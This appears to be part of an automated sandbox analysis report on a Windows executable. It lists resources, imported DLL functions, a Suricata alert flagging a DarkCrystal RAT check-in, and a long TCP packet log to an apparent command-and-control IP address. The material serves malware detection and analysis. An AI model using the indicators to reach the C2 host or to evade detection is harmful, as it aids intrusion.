RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T00:07:49.062914+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49736	104.21.38.84	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 00:07:47.749604940 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:47.869637012 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:47.869817972 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:47.870167017 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:47.990210056 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:48.227233887 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:48.347482920 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:48.959978104 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:49.062913895 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:49.247869968 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:49.247932911 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:49.248029947 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:49.607323885 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:49.727508068 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:49.921751022 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:49.922660112 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:50.042484045 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:50.398080111 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:50.444791079 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:50.746809006 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:50.750936985 CET	49737	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:50.867093086 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:50.870779037 CET	80	49737	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:50.871164083 CET	49737	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:50.871164083 CET	49737	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:50.991344929 CET	80	49737	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:51.062060118 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:51.080518961 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:51.200798035 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:51.200818062 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:51.226147890 CET	49737	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:51.346076012 CET	80	49737	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:51.555958033 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:51.629338026 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:51.959036112 CET	80	49737	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:52.147912025 CET	49737	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.204278946 CET	80	49737	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:52.257332087 CET	49737	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.653920889 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.654694080 CET	49740	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.687983990 CET	49737	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.774395943 CET	80	49736	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:52.774502993 CET	80	49740	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:52.774585962 CET	49736	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.774610043 CET	49740	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.788435936 CET	49740	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.808218002 CET	80	49737	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:52.808693886 CET	49737	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:52.908617973 CET	80	49740	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:53.141554117 CET	49740	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:53.216200113 CET	49740	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:53.261738062 CET	80	49740	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:53.377249002 CET	80	49740	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:53.395639896 CET	49742	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:53.516465902 CET	80	49742	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:53.516561985 CET	49742	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:53.540923119 CET	49742	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:53.661864042 CET	80	49742	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:53.668235064 CET	80	49740	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:53.668303013 CET	49740	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:53.945245981 CET	49742	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:54.065525055 CET	80	49742	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:54.602454901 CET	80	49742	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:54.693430901 CET	49742	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:54.850791931 CET	80	49742	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:54.944792032 CET	49742	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.071000099 CET	49742	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.075716019 CET	49743	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.191148043 CET	80	49742	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:55.191227913 CET	49742	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.195466042 CET	80	49743	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:55.195657969 CET	49743	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.196358919 CET	49743	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.316225052 CET	80	49743	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:55.439165115 CET	49743	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.439254999 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.559139967 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:55.559212923 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.577184916 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.601111889 CET	80	49743	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:55.643289089 CET	49746	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.696928978 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:55.763015985 CET	80	49746	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:55.765260935 CET	49746	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.765322924 CET	49746	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:55.885160923 CET	80	49746	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:55.929527044 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.049638033 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049674034 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049700975 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049726963 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049729109 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.049753904 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.049753904 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049767017 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.049801111 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.049804926 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049829960 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049849033 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.049923897 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049951077 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049974918 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.049983025 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.049998999 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.050031900 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.116885900 CET	49746	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.325496912 CET	80	49743	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.325592995 CET	49743	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.325949907 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.325999022 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.326037884 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.326077938 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.326100111 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.326170921 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.326239109 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.326251984 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.326282024 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.326294899 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.326545954 CET	80	49746	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.369152069 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.369256973 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.458599091 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.458715916 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.489391088 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489422083 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489445925 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489456892 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489552975 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489613056 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.489619017 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489687920 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489737034 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.489757061 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489789963 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489840031 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489866018 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489950895 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.489998102 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.490102053 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.490128994 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.490192890 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.578751087 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.578823090 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.578849077 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.578881025 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.578907013 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.578963995 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.578989983 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579015017 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579041004 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579097033 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579123020 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579171896 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579197884 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579224110 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579255104 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579279900 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579365015 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.579411983 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.609461069 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.609663963 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.609689951 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.609816074 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.609891891 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.609972000 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610022068 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610052109 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610130072 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610229015 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610276937 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610307932 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610403061 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610434055 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610574007 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610621929 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610647917 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610747099 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610773087 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610872030 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.610898018 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.611027956 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.611053944 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.611124992 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.611150980 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.652834892 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.757311106 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:56.850689888 CET	80	49746	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:56.944834948 CET	49746	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:57.085843086 CET	80	49746	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:57.132365942 CET	49746	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:57.277728081 CET	80	49746	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:57.414535046 CET	49746	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:57.415560007 CET	49747	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:57.534733057 CET	80	49746	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:57.535079956 CET	49746	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:57.535371065 CET	80	49747	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:57.535459042 CET	49747	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:57.535655975 CET	49747	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:57.655451059 CET	80	49747	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:57.858572006 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:57.882471085 CET	49747	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:57.960453033 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:58.003170013 CET	80	49747	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:58.093086004 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:58.093445063 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:58.213195086 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:58.407820940 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:58.408019066 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:58.527900934 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:58.528177023 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:58.621095896 CET	80	49747	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:58.757442951 CET	49747	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:58.922622919 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:58.928164959 CET	80	49747	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:59.163625002 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.163691998 CET	49747	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.562520027 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.562625885 CET	49747	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.567260981 CET	49750	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.682738066 CET	80	49744	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:59.682815075 CET	49744	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.683126926 CET	80	49747	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:59.683245897 CET	49747	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.687061071 CET	80	49750	104.21.38.84	192.168.2.4
Dec 17, 2024 00:07:59.687150002 CET	49750	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.687362909 CET	49750	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:07:59.807362080 CET	80	49750	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:00.038707018 CET	49750	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:00.158727884 CET	80	49750	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:00.795656919 CET	80	49750	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:00.960542917 CET	49750	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:01.046454906 CET	80	49750	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:01.147937059 CET	49750	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:01.167154074 CET	49750	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:01.167886972 CET	49756	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:01.287307978 CET	80	49750	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:01.287491083 CET	49750	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:01.309062958 CET	80	49756	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:01.309180975 CET	49756	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:01.309357882 CET	49756	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:01.429404020 CET	80	49756	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:01.663781881 CET	49756	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:01.783797979 CET	80	49756	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:02.394216061 CET	80	49756	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:02.444916964 CET	49756	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:02.651667118 CET	80	49756	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:02.760071039 CET	49756	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:02.778712988 CET	49757	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:02.898576021 CET	80	49757	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:02.898677111 CET	49757	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:02.898967981 CET	49757	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:03.018743992 CET	80	49757	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:03.257500887 CET	49757	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:03.377316952 CET	80	49757	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:03.930346966 CET	49757	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:03.930869102 CET	49763	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:03.982955933 CET	80	49757	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:03.983581066 CET	49757	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.049447060 CET	49764	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.050616980 CET	80	49757	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:04.050654888 CET	80	49763	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:04.050709009 CET	49757	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.050832987 CET	49763	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.050832987 CET	49763	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.169418097 CET	80	49764	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:04.169537067 CET	49764	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.169775963 CET	49764	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.170593023 CET	80	49763	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:04.289571047 CET	80	49764	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:04.398134947 CET	49763	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.518223047 CET	80	49763	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:04.518301010 CET	80	49763	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:04.523039103 CET	49764	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:04.642863035 CET	80	49764	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:05.136321068 CET	80	49763	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:05.179223061 CET	49763	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.255424023 CET	80	49764	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:05.304219961 CET	49764	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.389909029 CET	80	49763	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:05.444992065 CET	49763	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.532269955 CET	80	49764	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:05.585462093 CET	49764	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.669580936 CET	49763	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.669622898 CET	49764	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.670362949 CET	49769	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.789743900 CET	80	49763	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:05.789911985 CET	49763	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.790136099 CET	80	49769	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:05.790190935 CET	80	49764	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:05.790200949 CET	49769	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.790235996 CET	49764	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.790370941 CET	49769	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:05.910140038 CET	80	49769	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:06.148086071 CET	49769	80	192.168.2.4	104.21.38.84
